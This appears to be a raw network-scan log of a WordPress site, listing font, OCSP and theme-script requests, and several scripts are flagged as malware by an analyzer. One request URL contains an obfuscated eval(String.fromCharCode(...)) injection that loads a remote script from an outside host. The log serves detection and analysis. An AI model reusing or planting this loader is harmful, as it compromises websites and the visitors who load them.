Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2
216.58.207.195 200 OK 47 kB URL HTTP/2 fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 47048, version 1.0\012- data
Hash 87a1556b696ae2cb1a726bd8c4584a2f
1be0f6f39e0cf316f9827f945eeeaef8294cc37b
141f0c53e457585d4ac7426eb3d757666d250ee6fbf0e9c0878128e4c627f0b1
GET /s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://biasbd.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 47048
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 28 Sep 2022 19:27:54 GMT
expires: Thu, 28 Sep 2023 19:27:54 GMT
cache-control: public, max-age=31536000
age: 478563
last-modified: Wed, 27 Apr 2022 16:55:54 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
216.58.207.195 200 OK 31 kB URL HTTP/2 fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 30928, version 1.0\012- data
Hash ac0d2859ea5f8fd6bcb3c305c08ec184
7f6c17e3e592cd8bd346b9cc261d8dd961b8aef7
ae919a7c9f25f0fd97fc18e398ae8e453fcaae487e4a4cb4f896e7fecde4a780
GET /s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://biasbd.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 30928
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 29 Sep 2022 16:40:18 GMT
expires: Fri, 29 Sep 2023 16:40:18 GMT
cache-control: public, max-age=31536000
age: 402219
last-modified: Mon, 11 Jul 2022 18:57:39 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2
216.58.207.195 200 OK 45 kB URL HTTP/2 fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 45300, version 1.0\012- data
Hash 5fe660c3a23b871807b0e1d3ee973d23
62a9dd423b30b6ee3ab3dd40d573545d579af10a
e13ffa988be59cbf299d7ff68f019f902b60848203ac4990819eb7e4624ee52d
GET /s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://biasbd.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 45300
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 28 Sep 2022 19:27:53 GMT
expires: Thu, 28 Sep 2023 19:27:53 GMT
cache-control: public, max-age=31536000
age: 478564
last-modified: Wed, 27 Apr 2022 16:11:08 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:57 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
biasbd.com/wp-content/themes/industrial/js/jquery.swipebox.js?ver=5.2.16
111.221.45.32 200 OK 6.1 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/jquery.swipebox.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash b44b26124498d04e349ccdf85f31e3da
6d936f32bba6d3baa7cc26210c2cecf49beef4d2
9c811b9a34dad3db5bc5ab460e3a92a6cebe4c01f61d682616d1308fe5fa4d96
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/jquery.swipebox.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "6461-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 6053
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/bootstrap/bootstrap.min.js?ver=5.2.16
111.221.45.32 200 OK 9.8 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/bootstrap/bootstrap.min.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (32034), with CRLF line terminators
Hash 92078065c6bac430429cb347bca7d1e8
398b8503c88072d06deee2a54f1f50cfa30e04de
f55e3f9f06ccfc63bb4e9b94234f90202a2760b89acc74fd61fd18a4c9cd2dbf
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/bootstrap/bootstrap.min.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "8fd6-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 9770
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%2
0114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
172.67.20.217404 Not Found 764 B URL HTTP/1.1 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20
114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 172.67.20.217:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2986)
Hash e0b278a03f3c0916a366ea6e39a232c7
c383e5fa69a1cf6016560cb0aa9f17be5b699bea
22d617e43c0296250a3e4b524c3672329157563a5b5f065f4f7d0e8b5ea78e40
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%2
0112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://biasbd.com/
HTTP/1.1 404 Not Found
Date: Tue, 04 Oct 2022 08:23:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zotabox
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Encoding: gzip
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 754c84b8ffe20b65-OSL
biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=5.5
111.221.45.32 200 OK 9.9 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=5.5
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (32004)
Hash 45b6e9c3bb08e0e74f9d9e738bf95011
a9946063b6a32bd95fe9cae75f8632e4c56c590c
691322524f1e6e1634ead2eb07421f8aea3b3342d3e6322efb10a15270a5315c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=5.5 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Tue, 25 Dec 2018 05:41:38 GMT
etag: "8aaf-5c21c312-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 9866
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/doubletaptogo.js?ver=5.2.16
111.221.45.32 200 OK 3.4 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/doubletaptogo.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (6354), with CRLF line terminators
Hash 3a477a80b3dba84bdd15c517b7f83df7
f54aae0b203de8a874ecb53681c54c1960148bfa
7c2ea48d8f2f5e0d3593a85fb9e983e92d1d4e90b0a1d20acfa5e5debacdaf6e
GET /wp-content/themes/industrial/js/doubletaptogo.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "260f-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 3353
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/functions.js?ver=5.2.16
111.221.45.32 200 OK 11 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/functions.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (1673), with CRLF line terminators
Hash d91365dc0d9fa0c38d9beba66a97c179
2c13fee9a5d1ba23cb41b74e4b0e31c5d6256333
54f0a1eac958391d995f5afc56a83c3c83c805638d338d21c90a1952dc8a7a99
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/functions.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Fri, 17 Jun 2016 03:51:30 GMT
etag: "9e12-576373c2-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 10624
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/owlcarousel/owl.carousel.js?ver=5.2.16
